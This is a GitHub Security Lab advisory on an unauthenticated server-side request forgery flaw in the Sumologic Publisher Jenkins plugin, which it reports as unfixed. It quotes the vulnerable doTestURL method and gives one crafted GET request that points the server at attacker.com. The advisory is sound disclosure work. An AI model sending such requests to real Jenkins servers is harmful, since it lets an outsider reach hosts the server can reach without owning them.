Coordinated Disclosure Timeline
- 2023-04-11: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (no fix available).
Summary
A Server-Side Request Forgery (SSRF) vulnerability was found in the sumologic-publisher-plugin. The vulnerability resides in the com.sumologic.jenkins.jenkinssumologicplugin.PluginDescriptorImpl#doTestURL method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.
Product
Sumologic Publisher Jenkins plugin
Tested Version
Details
SSRF in com.sumologic.jenkins.jenkinssumologicplugin.PluginDescriptorImpl#doTestURL (GHSL-2023-071)
The doTestURL method in the PluginDescriptorImpl.java file lacks proper validation and sanitization of user input for the url parameter, allowing a blind exploitation of a server-side request forgery (SSRF).
Affected source code: PluginDescriptorImpl.java
public FormValidation doTestURL(@QueryParameter("url") String url) {
try {
StatusLine statusLine = LogSender.getInstance().testHTTPUrl(url);
if (200 == statusLine.getStatusCode()) {
return FormValidation.ok("Success");
} else {
return FormValidation.error("URL not valid with message " + statusLine.getReasonPhrase());
}
} catch (Exception e) {
return FormValidation.error("Failure : " + e.getMessage());
}
}
In order to exploit the vulnerability, an attacker may send the following crafted request:
GET /jenkins/descriptorByName/com.sumologic.jenkins.jenkinssumologicplugin.SumoBuildNotifier/testURL?url=http%3A%2F%2Fattacker.com HTTP/1.1
Host: localhost:8080
Connection: close
This vulnerability was found using CodeQL’s SSRF Java query.
Impact
This issue may lead to Server-Side Request Forgery.
CVE
- CVE-2023-37958 (CSRF)
- CVE-2023-37959 (missing permission check)
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-071 in any communication regarding this issue.